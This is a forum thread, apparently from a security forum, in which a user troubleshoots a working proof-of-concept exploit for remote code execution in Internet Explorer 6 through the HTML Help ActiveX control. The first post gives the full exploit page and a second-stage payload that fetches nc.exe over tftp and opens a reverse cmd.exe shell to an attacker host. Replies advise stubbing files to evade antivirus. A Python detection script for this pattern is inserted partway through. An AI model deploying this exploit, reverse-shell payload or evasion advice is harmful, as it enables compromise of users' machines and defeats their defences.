
Thread: Code Execution


  1. #1
    Junior Member Armagedeon

    Code Execution

    Could someone shed some light?

    I'm now trying to recreate the code execution exploit for IE 6.0 on an XP-SP2 box.

    I get the following error when I browse to the malicious web site:

    Code:
    An error has occured in the script onthis page.
    
    Line:  4
    Char:  1
    Error: Invalid character
    Code:  0
    URL:   ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
    
    Do you want to continue running scripts on this page?
    This is the htm code in my page:

    Code:
    <!-- 
    Download this file as well for your own testing:  original htm.txt
    http://www.milw0rm.com/down.php?id=723
    
    //str0ke
    -->  
    
    <html><head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><BODY style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this exploit can be found at <a href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm" target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. © 2004 ShredderSub7
    <script>
      function DisplayLocStrings() {
        Title.innerHTML = TAG_SYSCONFIG;
        Config_Link.innerHTML = TAG_OPENSYSCONFIG;
        Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
      }
      </script>
    <br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
    </OBJECT>
    <OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
    
    </OBJECT>
    <script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
    
    // milw0rm.com [2004-12-28]
    This is the code in my htm.txt

    Code:
    document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c tftp -i 10.10.52.20 GET nc.exe && nc.exe 10.10.52.20 443 -e cmd.exe && taskkill /f /im cmd.exe,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");
    
    # milw0rm.com [2004-12-28]
    When the error occurs I choose Yes for it to continue running the code, but it doesn't seem to continue, because I get no shell on my attacking machine... and yes, I have netcat listening on port 443.

    Could someone help?
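A defender-side check for the pattern this PoC relies on, added here as an example and not part of the thread or of the milw0rm PoC: it scans HTML for OBJECT tags carrying the HTML Help control CLSID quoted above and reports PARAMs that use the `shortcut` command or `ms-its:`/`javascript:` items, which is what an AV or web proxy signature for this class of page keys on. The two sample pages, the all-zero placeholder CLSID in the benign one and the placeholder file names are constructed for this example.

```python
import re
from typing import Dict, List

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), as used by the PoC quoted above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

OBJECT_RE = re.compile(r"<object\b(?P<attrs>[^>]*)>(?P<body>.*?)</object>",
                       re.IGNORECASE | re.DOTALL)
CLASSID_RE = re.compile(r"\bclassid\s*=\s*['\"]?clsid:(?P<clsid>[0-9a-f-]{36})",
                        re.IGNORECASE)
# Handles quoted and unquoted attribute values: value=shortcut, value='...' and value="...".
PARAM_RE = re.compile(
    r"<param\b[^>]*?\bname\s*=\s*['\"]?(?P<name>[^'\"\s>]+)['\"]?"
    r"[^>]*?\bvalue\s*=\s*(?P<q>['\"]?)(?P<value>.*?)(?P=q)\s*/?>",
    re.IGNORECASE | re.DOTALL,
)


def _params(body: str) -> Dict[str, str]:
    """Map lower-cased PARAM names to their values for one OBJECT body."""
    return {p.group("name").lower(): p.group("value").strip()
            for p in PARAM_RE.finditer(body)}


def hhctrl_findings(html: str) -> List[str]:
    """Return one finding per hhctrl.ocx OBJECT in the page, saying why it is suspicious."""
    findings: List[str] = []
    for m in OBJECT_RE.finditer(html):
        cm = CLASSID_RE.search(m.group("attrs"))
        if cm is None or cm.group("clsid").lower() != HHCTRL_CLSID:
            continue  # some other control; not what this check is about
        params = _params(m.group("body"))
        command = params.get("command", "").lower()
        reasons = []
        if command == "shortcut":
            # The 'shortcut' command makes the control launch the program named in item1.
            reasons.append("shortcut command launches item1=%r" % params.get("item1", ""))
        for name, value in sorted(params.items()):
            if not name.startswith("item"):
                continue
            low = value.lower()
            if "ms-its:" in low:
                reasons.append("%s opens a CHM page via ms-its: (%r)" % (name, value))
            if "javascript:" in low:
                reasons.append("%s runs script via javascript: (%r)" % (name, value))
        if not reasons:
            reasons.append("hhctrl.ocx object present with command=%r" % command)
        findings.append("hhctrl.ocx object: " + "; ".join(reasons))
    return findings


# Constructed sample: an ordinary page embedding some unrelated control (placeholder CLSID).
BENIGN_HTML = """<html><body><p>Hello</p>
<object id="player" classid="clsid:00000000-0000-0000-0000-000000000000">
<param name="autoplay" value="false"></object></body></html>"""

# Constructed sample mirroring the PoC's two stages: a hidden "Related Topics" menu
# pointing at an ms-its: page, then a shortcut command naming a placeholder program.
SUSPICIOUS_HTML = """<html><body>
<object id="x" classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Command" value="Related Topics, MENU">
<param name="Item1" value="command;ms-its:c:/placeholder.chm::/page.htm">
</object>
<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',placeholder.exe,'></object>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        print(label, hhctrl_findings(page) or ["no hhctrl.ocx objects"])
```

Matching on the CLSID rather than on the `tftp`/`nc.exe` strings is deliberate: the payload in `htm.txt` is loaded in a second request and can be rewritten freely, whereas any page abusing this control has to name the same CLSID and one of the same commands.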

  2. #2
    Member The_Denv

    Try removing some comments ... I don't think that some of those comments are for htm/l

  3. #3
    Junior Member Armagedeon

    Thanks The_Denv

    I will try it out. I believe it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

    Darnnnnnn AV

  4. #4
    Member The_Denv

    Quote Originally Posted by Armagedeon:
        Thanks The_Denv

        I will try it out. I believe it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

        Darnnnnnn AV

    Nice one, sounds like it worked.
    Listen, if you do not want any type of file being detected by an AV such as AVG, stub the file. muts did a presentation at ShmooCon about it. Rather than linking you directly to the video, here is a thread on 'I piss on your AV' within remote-exploit discussing the video:
    http://forums.remote-exploit.org/showthread.php?t=12353

    Good luck

  5. #5
    Junior Member Armagedeon

    Hi there The_Denv

    Funny you mention this, I have that video... I believe it is on rapidshare... :
    I've been trying to download ncx99.exe, the application used in the video, but the f#%$&#" AV doesn't let me
    I believe that even LordPE pissed him off. Dammm AV...

  6. #6
    Junior Member Armagedeon

    Thorn

    For real ???????

    I'm browsing with IE on a Windows machine, AV is Trend, and it doesn't complain...

    I'm sorry if I caused any problems

    What can I do to remedy this?

  7. #7
    Senior Member Thorn (The Green Dome)

    For what it's worth, something has to be correct. NAV won't even allow this RE Forums page to load on a Windows machine in either FF or IE, as it detects the code.

    I had to jump to a Linux laptop to see what was posted here.
    Thorn
    Stop the TSA now! Boycott the airlines.
